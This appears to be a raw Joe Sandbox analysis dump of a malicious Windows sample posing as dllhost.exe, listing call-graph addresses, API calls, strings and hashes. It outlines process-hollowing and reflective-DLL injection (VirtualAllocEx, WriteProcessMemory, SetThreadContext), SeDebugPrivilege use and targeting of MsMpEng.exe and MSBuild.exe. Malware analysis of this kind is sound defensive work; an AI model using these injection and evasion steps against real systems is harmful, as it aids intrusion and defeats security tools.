8687->8688 8689 2e86a09bfd5 8688->8689 8690 2e86a09ef30 30 API calls 8689->8690 8691 2e86a09c00b 8690->8691 8692 2e86a09b860 _invalid_parameter_noinfo 17 API calls 8691->8692 8693 2e86a09c0e2 8692->8693 8694 2e86a09ad0c 33 API calls 8693->8694 8695 2e86a09c1bf 8694->8695 8696 2e86a09d614 5 API calls 8695->8696 8697 2e86a09c1ed 8696->8697 8717 2e86a09ba4c 8697->8717 8700 2e86a09c270 8701 2e86a09ad0c 33 API calls 8700->8701 8702 2e86a09c2a3 8701->8702 8703 2e86a09d614 5 API calls 8702->8703 8704 2e86a09c2cb 8703->8704 8739 2e86a09bbc4 8704->8739 8707 2e86a09bf5c 38 API calls 8712 2e86a09ef48 8708->8712 8709 2e86a09ef4d 8710 2e86a09ef63 8709->8710 8711 2e86a09b960 _set_errno_from_matherr 13 API calls 8709->8711 8710->8678 8713 2e86a09ef57 8711->8713 8712->8709 8712->8710 8715 2e86a09ef92 8712->8715 8714 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8713->8714 8714->8710 8715->8710 8716 2e86a09b960 _set_errno_from_matherr 13 API calls 8715->8716 8716->8713 8718 2e86a09ba97 8717->8718 8719 2e86a09ba75 8717->8719 8720 2e86a09baf0 8718->8720 8721 2e86a09ba9b 8718->8721 8723 2e86a09b9f8 __free_lconv_num 13 API calls 8719->8723 8730 2e86a09ba83 FindFirstFileExW 8719->8730 8722 2e86a09d144 MultiByteToWideChar 8720->8722 8724 2e86a09baaf 8721->8724 8726 2e86a09b9f8 __free_lconv_num 13 API calls 8721->8726 8721->8730 8733 2e86a09bb0b 8722->8733 8723->8730 8727 2e86a09af2c 14 API calls 8724->8727 8725 2e86a09bb12 GetLastError 8728 2e86a09b8f0 13 API calls 8725->8728 8726->8724 8727->8730 8731 2e86a09bb1f 8728->8731 8729 2e86a09bb4b 8729->8730 8734 2e86a09d144 MultiByteToWideChar 8729->8734 8730->8700 8736 2e86a09b960 _set_errno_from_matherr 13 API calls 8731->8736 8732 2e86a09bb3f 8738 2e86a09af2c 14 API calls 8732->8738 8733->8725 8733->8729 8733->8732 8737 2e86a09b9f8 __free_lconv_num 13 API calls 8733->8737 8735 2e86a09bb93 8734->8735 8735->8725 8735->8730 8736->8730 8737->8732 8738->8729 8740 2e86a09bc0f 8739->8740 8741 2e86a09bbed 8739->8741 8743 2e86a09bc14 
8740->8743 8744 2e86a09bc68 8740->8744 8742 2e86a09bbfb 8741->8742 8745 2e86a09b9f8 __free_lconv_num 13 API calls 8741->8745 8742->8707 8743->8742 8747 2e86a09bc28 8743->8747 8749 2e86a09b9f8 __free_lconv_num 13 API calls 8743->8749 8746 2e86a09d1a0 WideCharToMultiByte 8744->8746 8745->8742 8754 2e86a09bc8c 8746->8754 8750 2e86a09af2c 14 API calls 8747->8750 8748 2e86a09bc93 GetLastError 8751 2e86a09b8f0 13 API calls 8748->8751 8749->8747 8750->8742 8753 2e86a09bca0 8751->8753 8752 2e86a09d1a0 WideCharToMultiByte 8756 2e86a09bd1f 8752->8756 8757 2e86a09b960 _set_errno_from_matherr 13 API calls 8753->8757 8754->8748 8758 2e86a09b9f8 __free_lconv_num 13 API calls 8754->8758 8759 2e86a09bcce 8754->8759 8760 2e86a09bcc3 8754->8760 8755 2e86a09af2c 14 API calls 8755->8759 8756->8742 8756->8748 8757->8742 8758->8760 8759->8742 8759->8752 8760->8755 7614 2e86a095654 7615 2e86a09565a 7614->7615 7626 2e86a097c90 7615->7626 7620 2e86a095757 _invalid_parameter_noinfo 7622 2e86a0958dd 7620->7622 7624 2e86a0956be 7620->7624 7639 2e86a097860 7620->7639 7621 2e86a0959db 7622->7621 7623 2e86a095a57 VirtualProtect 7622->7623 7623->7624 7625 2e86a095a83 GetLastError 7623->7625 7625->7624 7629 2e86a097c9b 7626->7629 7627 2e86a09569d 7627->7624 7635 2e86a0940e0 7627->7635 7628 2e86a099e44 _set_errno_from_matherr 2 API calls 7628->7629 7629->7627 7629->7628 7630 2e86a097cba 7629->7630 7631 2e86a097cc5 7630->7631 7645 2e86a0984bc 7630->7645 7649 2e86a0984dc 7631->7649 7636 2e86a0940fd 7635->7636 7638 2e86a09416c _invalid_parameter_noinfo 7636->7638 7658 2e86a094350 7636->7658 7638->7620 7640 2e86a0978a7 7639->7640 7683 2e86a097630 7640->7683 7643 2e86a097d60 _handle_error 8 API calls 7644 2e86a0978d1 7643->7644 7644->7620 7646 2e86a0984ca std::bad_alloc::bad_alloc 7645->7646 7653 2e86a0995f0 7646->7653 7648 2e86a0984db 7650 2e86a0984ea std::bad_alloc::bad_alloc 7649->7650 7651 2e86a0995f0 Concurrency::cancel_current_task 2 API calls 7650->7651 7652 2e86a097ccb 7651->7652 7654 
2e86a09962c RtlPcToFileHeader 7653->7654 7655 2e86a09960f 7653->7655 7656 2e86a099653 RaiseException 7654->7656 7657 2e86a099644 7654->7657 7655->7654 7656->7648 7657->7656 7659 2e86a094374 7658->7659 7660 2e86a094397 7658->7660 7659->7660 7672 2e86a093e00 7659->7672 7661 2e86a0943cd 7660->7661 7678 2e86a093f30 7660->7678 7663 2e86a0943fd 7661->7663 7667 2e86a093f30 2 API calls 7661->7667 7665 2e86a094433 7663->7665 7668 2e86a093e00 3 API calls 7663->7668 7666 2e86a09444f 7665->7666 7669 2e86a093e00 3 API calls 7665->7669 7670 2e86a093f30 2 API calls 7666->7670 7671 2e86a09446b 7666->7671 7667->7663 7668->7665 7669->7666 7670->7671 7671->7638 7673 2e86a093e21 _invalid_parameter_noinfo 7672->7673 7674 2e86a093e76 VirtualQuery 7673->7674 7675 2e86a093e90 7673->7675 7676 2e86a093eaa VirtualAlloc 7673->7676 7674->7673 7674->7675 7675->7660 7676->7675 7677 2e86a093edb GetLastError 7676->7677 7677->7673 7677->7675 7681 2e86a093f48 _invalid_parameter_noinfo 7678->7681 7679 2e86a093fb7 7679->7661 7680 2e86a093f9d VirtualQuery 7680->7679 7680->7681 7681->7679 7681->7680 7682 2e86a094002 GetLastError 7681->7682 7682->7681 7684 2e86a09764b 7683->7684 7685 2e86a097661 SetLastError 7684->7685 7686 2e86a09766f 7684->7686 7685->7686 7686->7643 7687 2e86a09fa54 7690 2e86a09cd58 7687->7690 7691 2e86a09cdaa 7690->7691 7692 2e86a09cd65 7690->7692 7696 2e86a09b41c 7692->7696 7697 2e86a09b432 7696->7697 7698 2e86a09b42d 7696->7698 7700 2e86a09d728 _set_errno_from_matherr 6 API calls 7697->7700 7706 2e86a09b43a 7697->7706 7699 2e86a09d6e0 _set_errno_from_matherr 6 API calls 7698->7699 7699->7697 7701 2e86a09b451 7700->7701 7702 2e86a09b980 _set_errno_from_matherr 13 API calls 7701->7702 7701->7706 7704 2e86a09b464 7702->7704 7707 2e86a09b482 7704->7707 7708 2e86a09b472 7704->7708 7709 2e86a09b4b4 7706->7709 7739 2e86a09acb4 7706->7739 7711 2e86a09d728 _set_errno_from_matherr 6 API calls 7707->7711 7710 2e86a09d728 _set_errno_from_matherr 6 API calls 7708->7710 7721 2e86a09cae0 
7709->7721 7712 2e86a09b479 7710->7712 7713 2e86a09b48a 7711->7713 7716 2e86a09b9f8 __free_lconv_num 13 API calls 7712->7716 7714 2e86a09b4a0 7713->7714 7715 2e86a09b48e 7713->7715 7718 2e86a09b0b4 _set_errno_from_matherr 13 API calls 7714->7718 7717 2e86a09d728 _set_errno_from_matherr 6 API calls 7715->7717 7716->7706 7717->7712 7719 2e86a09b4a8 7718->7719 7719->7706 7720 2e86a09b9f8 __free_lconv_num 13 API calls 7719->7720 7720->7706 7833 2e86a09cca0 7721->7833 7723 2e86a09cb09 7848 2e86a09c7ec 7723->7848 7726 2e86a09cb23 7726->7691 7728 2e86a09cbcf 7730 2e86a09b9f8 __free_lconv_num 13 API calls 7728->7730 7730->7726 7733 2e86a09cbca 7734 2e86a09b960 _set_errno_from_matherr 13 API calls 7733->7734 7734->7728 7735 2e86a09cc2c 7735->7728 7873 2e86a09c630 7735->7873 7736 2e86a09cbef 7736->7735 7737 2e86a09b9f8 __free_lconv_num 13 API calls 7736->7737 7737->7735 7748 2e86a09dd28 7739->7748 7774 2e86a09dce0 7748->7774 7779 2e86a09aebc EnterCriticalSection 7774->7779 7834 2e86a09ccc3 7833->7834 7835 2e86a09cccd 7834->7835 7888 2e86a09aebc EnterCriticalSection 7834->7888 7838 2e86a09cd3f 7835->7838 7839 2e86a09acb4 33 API calls 7835->7839 7838->7723 7841 2e86a09cd57 7839->7841 7844 2e86a09b41c 33 API calls 7841->7844 7847 2e86a09cdaa 7841->7847 7845 2e86a09cd94 7844->7845 7846 2e86a09cae0 43 API calls 7845->7846 7846->7847 7847->7723 7889 2e86a09ad0c 7848->7889 7851 2e86a09c81e 7853 2e86a09c823 GetACP 7851->7853 7854 2e86a09c833 7851->7854 7852 2e86a09c80c GetOEMCP 7852->7854 7853->7854 7854->7726 7855 2e86a09af2c 7854->7855 7856 2e86a09af77 7855->7856 7861 2e86a09af3b _set_errno_from_matherr 7855->7861 7858 2e86a09b960 _set_errno_from_matherr 13 API calls 7856->7858 7857 2e86a09af5e HeapAlloc 7859 2e86a09af75 7857->7859 7857->7861 7858->7859 7859->7728 7862 2e86a09cdd4 7859->7862 7860 2e86a099e44 _set_errno_from_matherr 2 API calls 7860->7861 7861->7856 7861->7857 7861->7860 7863 2e86a09c7ec 35 API calls 7862->7863 7864 2e86a09cdff 7863->7864 7866 2e86a09ce3c 
IsValidCodePage 7864->7866 7870 2e86a09ce7f _invalid_parameter_noinfo 7864->7870 7865 2e86a097d60 _handle_error 8 API calls 7867 2e86a09cbc3 7865->7867 7868 2e86a09ce4d 7866->7868 7866->7870 7867->7733 7867->7736 7869 2e86a09ce84 GetCPInfo 7868->7869 7872 2e86a09ce56 _invalid_parameter_noinfo 7868->7872 7869->7870 7869->7872 7870->7865 7921 2e86a09c8fc 7872->7921 7995 2e86a09aebc EnterCriticalSection 7873->7995 7890 2e86a09ad2b 7889->7890 7891 2e86a09ad30 7889->7891 7890->7851 7890->7852 7891->7890 7892 2e86a09b348 33 API calls 7891->7892 7893 2e86a09ad4b 7892->7893 7897 2e86a09e604 7893->7897 7898 2e86a09e619 7897->7898 7899 2e86a09ad6e 7897->7899 7898->7899 7905 2e86a09eaac 7898->7905 7901 2e86a09e638 7899->7901 7902 2e86a09e660 7901->7902 7903 2e86a09e64d 7901->7903 7902->7890 7903->7902 7918 2e86a09cdb8 7903->7918 7906 2e86a09b348 33 API calls 7905->7906 7907 2e86a09eabb 7906->7907 7908 2e86a09eb06 7907->7908 7917 2e86a09aebc EnterCriticalSection 7907->7917 7908->7899 7919 2e86a09b348 33 API calls 7918->7919 7920 2e86a09cdc1 7919->7920 7922 2e86a09c939 GetCPInfo 7921->7922 7931 2e86a09ca2f 7921->7931 7927 2e86a09c94c 7922->7927 7922->7931 7923 2e86a097d60 _handle_error 8 API calls 7924 2e86a09cac8 7923->7924 7924->7870 7932 2e86a09f514 7927->7932 7931->7923 7933 2e86a09ad0c 33 API calls 7932->7933 7934 2e86a09f556 7933->7934 7952 2e86a09d144 7934->7952 7953 2e86a09d14c MultiByteToWideChar 7952->7953 8761 2e86a09d354 8762 2e86a09d393 8761->8762 8763 2e86a09d376 8761->8763 8765 2e86a09d39d 8762->8765 8770 2e86a09fa6c 8762->8770 8763->8762 8764 2e86a09d384 8763->8764 8766 2e86a09b960 _set_errno_from_matherr 13 API calls 8764->8766 8777 2e86a09faa8 8765->8777 8769 2e86a09d389 _invalid_parameter_noinfo 8766->8769 8771 2e86a09fa75 8770->8771 8772 2e86a09fa8e HeapSize 8770->8772 8773 2e86a09b960 _set_errno_from_matherr 13 API calls 8771->8773 8774 2e86a09fa7a 8773->8774 8775 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8774->8775 8776 2e86a09fa85 8775->8776 
8776->8765 8778 2e86a09fac7 8777->8778 8779 2e86a09fabd 8777->8779 8781 2e86a09facc 8778->8781 8787 2e86a09fad3 _set_errno_from_matherr 8778->8787 8780 2e86a09af2c 14 API calls 8779->8780 8785 2e86a09fac5 8780->8785 8782 2e86a09b9f8 __free_lconv_num 13 API calls 8781->8782 8782->8785 8783 2e86a09fb06 HeapReAlloc 8783->8785 8783->8787 8784 2e86a09fad9 8786 2e86a09b960 _set_errno_from_matherr 13 API calls 8784->8786 8785->8769 8786->8785 8787->8783 8787->8784 8788 2e86a099e44 _set_errno_from_matherr 2 API calls 8787->8788 8788->8787 7996 2e86a099448 8003 2e86a0998c4 7996->8003 7999 2e86a099455 8019 2e86a099bac 8003->8019 8006 2e86a099451 8006->7999 8008 2e86a099858 8006->8008 8007 2e86a0998f8 __vcrt_uninitialize_locks DeleteCriticalSection 8007->8006 8033 2e86a099a80 8008->8033 8024 2e86a099930 8019->8024 8022 2e86a099bf7 InitializeCriticalSectionAndSpinCount 8023 2e86a0998dc 8022->8023 8023->8006 8023->8007 8025 2e86a099974 try_get_function 8024->8025 8031 2e86a099a4a 8024->8031 8026 2e86a0999a2 LoadLibraryExW 8025->8026 8027 2e86a099a39 GetProcAddress 8025->8027 8025->8031 8032 2e86a0999e5 LoadLibraryExW 8025->8032 8028 2e86a0999c3 GetLastError 8026->8028 8029 2e86a099a19 8026->8029 8027->8031 8028->8025 8029->8027 8030 2e86a099a30 FreeLibrary 8029->8030 8030->8027 8031->8022 8031->8023 8032->8025 8032->8029 8034 2e86a099930 __vcrt_InitializeCriticalSectionEx 5 API calls 8033->8034 8035 2e86a099aa5 TlsAlloc 8034->8035 8386 2e86a091ac8 8393 2e86a091628 GetProcessHeap HeapAlloc 8386->8393 8388 2e86a091ade Sleep 8389 2e86a091628 50 API calls 8388->8389 8390 2e86a091ad7 8389->8390 8390->8388 8392 2e86a091598 StrCmpIW StrCmpW 8390->8392 8444 2e86a0918b4 8390->8444 8392->8390 8461 2e86a091268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8393->8461 8395 2e86a091650 8462 2e86a091000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8395->8462 8397 2e86a091658 8463 2e86a091268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8397->8463 8399 2e86a091661 8464 
2e86a091268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8399->8464 8401 2e86a09166a 8465 2e86a091268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8401->8465 8403 2e86a091673 8466 2e86a091000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8403->8466 8405 2e86a09167c 8467 2e86a091000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8405->8467 8407 2e86a091685 8468 2e86a091000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8407->8468 8409 2e86a09168e RegOpenKeyExW 8410 2e86a0916c0 RegOpenKeyExW 8409->8410 8411 2e86a0918a6 8409->8411 8412 2e86a0916e9 8410->8412 8413 2e86a0916ff RegOpenKeyExW 8410->8413 8411->8390 8469 2e86a0912bc RegQueryInfoKeyW 8412->8469 8415 2e86a091723 8413->8415 8416 2e86a09173a RegOpenKeyExW 8413->8416 8478 2e86a09104c RegQueryInfoKeyW 8415->8478 8419 2e86a091775 RegOpenKeyExW 8416->8419 8420 2e86a09175e 8416->8420 8423 2e86a0917b0 RegOpenKeyExW 8419->8423 8424 2e86a091799 8419->8424 8422 2e86a0912bc 16 API calls 8420->8422 8427 2e86a09176b RegCloseKey 8422->8427 8425 2e86a0917d4 8423->8425 8426 2e86a0917eb RegOpenKeyExW 8423->8426 8428 2e86a0912bc 16 API calls 8424->8428 8429 2e86a0912bc 16 API calls 8425->8429 8430 2e86a091826 RegOpenKeyExW 8426->8430 8431 2e86a09180f 8426->8431 8427->8419 8432 2e86a0917a6 RegCloseKey 8428->8432 8433 2e86a0917e1 RegCloseKey 8429->8433 8435 2e86a091861 RegOpenKeyExW 8430->8435 8436 2e86a09184a 8430->8436 8434 2e86a09104c 6 API calls 8431->8434 8432->8423 8433->8426 8437 2e86a09181c RegCloseKey 8434->8437 8439 2e86a091885 8435->8439 8440 2e86a09189c RegCloseKey 8435->8440 8438 2e86a09104c 6 API calls 8436->8438 8437->8430 8441 2e86a091857 RegCloseKey 8438->8441 8442 2e86a09104c 6 API calls 8439->8442 8440->8411 8441->8435 8443 2e86a091892 RegCloseKey 8442->8443 8443->8440 8483 2e86a0914a4 8444->8483 8461->8395 8462->8397 8463->8399 8464->8401 8465->8403 8466->8405 8467->8407 8468->8409 8470 2e86a091327 GetProcessHeap HeapAlloc 8469->8470 8471 2e86a09148a RegCloseKey 8469->8471 8472 2e86a091352 
RegEnumValueW 8470->8472 8473 2e86a091476 GetProcessHeap HeapFree 8470->8473 8471->8413 8475 2e86a0913a5 8472->8475 8473->8471 8474 2e86a09152c 2 API calls 8474->8475 8475->8472 8475->8473 8475->8474 8476 2e86a0913d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 8475->8476 8477 2e86a09141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 8475->8477 8476->8477 8477->8475 8479 2e86a0911b7 RegCloseKey 8478->8479 8482 2e86a0910bf 8478->8482 8479->8416 8480 2e86a0910cf RegEnumValueW 8480->8482 8481 2e86a091150 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 8481->8482 8482->8479 8482->8480 8482->8481 8484 2e86a0914e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 8483->8484 8485 2e86a0914c1 GetProcessHeap HeapFree 8483->8485 8485->8484 8485->8485 8037 2e86a0a2a61 __scrt_dllmain_exception_filter 8891 2e86a09dbe4 8892 2e86a09dbf0 8891->8892 8894 2e86a09dc17 8892->8894 8895 2e86a09fc7c 8892->8895 8896 2e86a09fc81 8895->8896 8900 2e86a09fcbc 8895->8900 8897 2e86a09fca2 DeleteCriticalSection 8896->8897 8898 2e86a09fcb4 8896->8898 8897->8897 8897->8898 8899 2e86a09b9f8 __free_lconv_num 13 API calls 8898->8899 8899->8900 8900->8892 8901 1400031d8 8902 1400033f1 8901->8902 8903 1400031ff 8901->8903 8904 14000356d ReadFile 8902->8904 8905 1400033fd 8902->8905 8906 140003205 8903->8906 8907 14000335f GetProcessHeap HeapAlloc K32EnumProcesses 8903->8907 8908 14000329d 8904->8908 8909 140003597 8904->8909 8910 140003563 8905->8910 8911 140003406 8905->8911 8912 140003211 8906->8912 8913 140003356 ExitProcess 8906->8913 8907->8908 8929 14000339d 8907->8929 8909->8908 8916 1400035a4 GetProcessHeap HeapAlloc 8909->8916 8919 140001f68 22 API calls 8910->8919 8917 140003412 8911->8917 8918 140003508 8911->8918 8914 14000321a 8912->8914 8915 1400032be RegOpenKeyExW 8912->8915 8914->8908 8932 140003234 ReadFile 8914->8932 8924 140003327 8915->8924 8925 1400032eb RegDeleteValueW RegDeleteValueW RegDeleteValueW 8915->8925 8920 140001cdc 13 API calls 8916->8920 8921 140003454 8917->8921 8922 
140003417 8917->8922 8923 1400020e8 ReadFile 8918->8923 8919->8908 8943 1400035dd 8920->8943 8977 1400020e8 8921->8977 8922->8908 8974 140002c64 8922->8974 8927 140003517 8923->8927 8961 140002168 SysAllocString SysAllocString CoInitializeEx 8924->8961 8925->8924 8926 140001854 31 API calls 8926->8929 8927->8908 8939 1400020e8 ReadFile 8927->8939 8929->8908 8929->8926 8931 140003333 8936 140002168 9 API calls 8931->8936 8932->8908 8937 14000325e 8932->8937 8933 140003612 GetProcessHeap HeapFree 8933->8908 8942 14000333f 8936->8942 8937->8908 8948 140001854 31 API calls 8937->8948 8945 14000352e 8939->8945 8940 14000346b ReadFile 8940->8908 8941 140003493 8940->8941 8941->8908 8946 1400034a0 GetProcessHeap HeapAlloc ReadFile 8941->8946 8969 140001f68 GetProcessHeap HeapAlloc 8942->8969 8943->8933 9009 140001ed8 8943->9009 8945->8908 8950 140003536 ShellExecuteW 8945->8950 8946->8933 8951 1400034e4 8946->8951 8953 140003284 8948->8953 8950->8908 8951->8933 8981 140002430 8951->8981 8956 140001854 31 API calls 8953->8956 8956->8908 8962 1400022ce SysFreeString SysFreeString 8961->8962 8963 1400021af CoInitializeSecurity 8961->8963 8962->8931 8964 1400021f7 CoCreateInstance 8963->8964 8965 1400021eb 8963->8965 8966 1400022c8 CoUninitialize 8964->8966 8967 14000222b VariantInit 8964->8967 8965->8964 8965->8966 8966->8962 8968 140002281 8967->8968 8968->8966 8970 140001cdc 13 API calls 8969->8970 8971 140001fa6 8970->8971 8972 140001fd4 GetProcessHeap HeapFree 8971->8972 8973 140001ed8 5 API calls 8971->8973 8973->8971 8975 1400020b8 2 API calls 8974->8975 8976 140002c79 8975->8976 8978 14000210c ReadFile 8977->8978 8979 14000212f 8978->8979 8980 140002149 8978->8980 8979->8978 8979->8980 8980->8908 8980->8940 8982 140002467 8981->8982 9006 140002917 8981->9006 8983 1400020b8 2 API calls 8982->8983 8986 140002476 8982->8986 8983->8986 8984 1400024d3 CreateProcessW 8984->8986 8985 1400028db OpenProcess 8985->8986 8987 1400028ee TerminateProcess 8985->8987 8986->8984 
8986->8985 8988 1400020b8 GetModuleHandleA GetProcAddress 8986->8988 8989 140002726 VirtualAllocEx 8986->8989 8990 140002566 VirtualAllocEx 8986->8990 8995 140002845 VirtualAlloc 8986->8995 8996 140002685 VirtualAlloc 8986->8996 8997 1400027c1 WriteProcessMemory 8986->8997 9000 140002601 WriteProcessMemory 8986->9000 9005 1400028c1 ResumeThread 8986->9005 8986->9006 9007 14000264b VirtualProtectEx 8986->9007 9008 14000280b VirtualProtectEx 8986->9008 8987->8986 8988->8986 8989->8986 8991 140002756 WriteProcessMemory 8989->8991 8990->8986 8992 140002596 WriteProcessMemory 8990->8992 8991->8986 8993 140002778 VirtualProtectEx 8991->8993 8992->8986 8994 1400025b8 VirtualProtectEx 8992->8994 8993->8986 8994->8986 8995->8986 8999 140002864 Wow64GetThreadContext 8995->8999 8996->8986 8998 1400026a8 GetThreadContext 8996->8998 8997->8986 8998->8986 9002 1400026c8 WriteProcessMemory 8998->9002 8999->8986 9001 14000287f WriteProcessMemory 8999->9001 9000->8986 9001->8986 9003 1400028a3 Wow64SetThreadContext 9001->9003 9002->8986 9004 1400026f2 SetThreadContext 9002->9004 9003->8986 9004->8986 9005->8986 9005->9006 9006->8933 9007->8986 9008->8986 9010 140001f51 9009->9010 9011 140001ef7 OpenProcess 9009->9011 9010->8933 9011->9010 9012 140001f0f 9011->9012 9013 140002c04 2 API calls 9012->9013 9014 140001f2f 9013->9014 9015 140001f48 CloseHandle 9014->9015 9016 140001f3d CloseHandle 9014->9016 9015->9010 9016->9015 8486 2e86a095cd9 8487 2e86a095ce0 VirtualProtect 8486->8487 8488 2e86a095bf0 8487->8488 8489 2e86a095d09 GetLastError 8487->8489 8489->8488 8490 2e86a093ed9 8493 2e86a093e26 _invalid_parameter_noinfo 8490->8493 8491 2e86a093e90 8492 2e86a093e76 VirtualQuery 8492->8491 8492->8493 8493->8491 8493->8492 8494 2e86a093eaa VirtualAlloc 8493->8494 8494->8491 8495 2e86a093edb GetLastError 8494->8495 8495->8491 8495->8493

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                        • String ID: ?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Deaddll32$Deaddll64$SOFTWARE$SOFTWARE\Deadconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                        • API String ID: 3658652915-705066980
                                                        • Opcode ID: 09e549efbda8c35b39a76a366dbe8028c3cee4715c97da4422c7ce70c0244594
                                                        • Instruction ID: bfed91f18c334a7cc4a0b1e358a8adad7fcd43e68269cf6643d78abe2c04a47a
                                                        • Opcode Fuzzy Hash: 09e549efbda8c35b39a76a366dbe8028c3cee4715c97da4422c7ce70c0244594
                                                        • Instruction Fuzzy Hash: 4CC1F2B2200A4186EB26DF22F8547DA37A5FB8CBD9F814116FB4A43A75DF38C589C744

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 45 140001854-140001899 OpenProcess 46 140001cbe-140001cda 45->46 47 14000189f-1400018b5 IsWow64Process 45->47 48 1400018b7-1400018c6 47->48 49 1400018c8 47->49 50 1400018ce-1400018da CloseHandle 48->50 49->50 50->46 51 1400018e0-1400018eb 50->51 51->46 52 1400018f1-140001900 51->52 53 140001912 52->53 54 140001902-140001907 52->54 56 140001914-140001916 53->56 54->46 55 14000190d-140001910 54->55 55->56 56->46 57 14000191c-140001932 OpenProcess 56->57 57->46 58 140001938-140001951 OpenProcess 57->58 59 1400019f1-140001a10 NtQueryInformationProcess 58->59 60 140001957-14000196e K32GetModuleFileNameExW 58->60 63 140001cb5-140001cb8 CloseHandle 59->63 64 140001a16-140001a1a 59->64 61 1400019a0-1400019ac CloseHandle 60->61 62 140001970-14000198b PathFindFileNameW lstrlenW 60->62 61->59 66 1400019ae-1400019c8 61->66 62->61 65 14000198d-14000199d StrCpyW 62->65 63->46 64->63 67 140001a20-140001a38 OpenProcessToken 64->67 65->61 69 1400019cd-1400019df StrCmpIW 66->69 67->63 68 140001a3e-140001a64 GetTokenInformation 67->68 70 140001ae1 68->70 71 140001a66-140001a6f GetLastError 68->71 69->63 72 1400019e5-1400019ef 69->72 74 140001ae8-140001af6 CloseHandle 70->74 71->70 73 140001a71-140001a85 LocalAlloc 71->73 72->59 72->69 73->70 75 140001a87-140001aad GetTokenInformation 73->75 74->63 76 140001afc-140001b03 74->76 77 140001acf 75->77 78 140001aaf-140001acd GetSidSubAuthorityCount GetSidSubAuthority 75->78 76->63 79 140001b09-140001b14 76->79 80 140001ad6-140001adf LocalFree 77->80 78->80 79->63 81 140001b1a-140001b24 79->81 80->74 82 140001b26-140001b30 81->82 83 140001b3f 81->83 82->63 84 140001b36-140001b3d 82->84 85 140001b43-140001b7b call 1400029a8 * 3 83->85 84->85 85->63 92 140001b81-140001ba1 call 1400029a8 StrStrA 85->92 95 140001ba3-140001bb3 92->95 96 140001bba-140001bdf call 1400029a8 * 2 92->96 95->92 97 140001bb5 95->97 96->63 102 140001be5-140001c0e VirtualAllocEx 96->102 97->63 
102->63 103 140001c14-140001c2d WriteProcessMemory 102->103 103->63 104 140001c33-140001c55 call 140002c04 103->104 104->63 107 140001c57-140001c5f 104->107 107->63 108 140001c61-140001c6e WaitForSingleObject 107->108 109 140001caa-140001caf CloseHandle 108->109 110 140001c70-140001c84 GetExitCodeThread 108->110 109->63 111 140001c86-140001c8c 110->111 112 140001c8f-140001ca8 VirtualFreeEx 110->112 111->112 112->109
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                        • API String ID: 2456419452-2628171563
                                                        • Opcode ID: 6ed84dbf6c60baabb87f5e27460d6d0a7eb95a1c4c3bfaadbfcf50804f83e4d3
                                                        • Instruction ID: 2def5684ad40d20a49040a85348fb744831477dd2d93b0325c4797c406c44bfc
                                                        • Opcode Fuzzy Hash: 6ed84dbf6c60baabb87f5e27460d6d0a7eb95a1c4c3bfaadbfcf50804f83e4d3
                                                        • Instruction Fuzzy Hash: 3BC16BB270464186EB66DF23F8907E923A5FB88BC4F444225EF4A47BA5DF38C985C744

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 5eedca2a6ebaa50de0a645c3a268b9ad974e8a0cc72b2613e158502b10b35cba
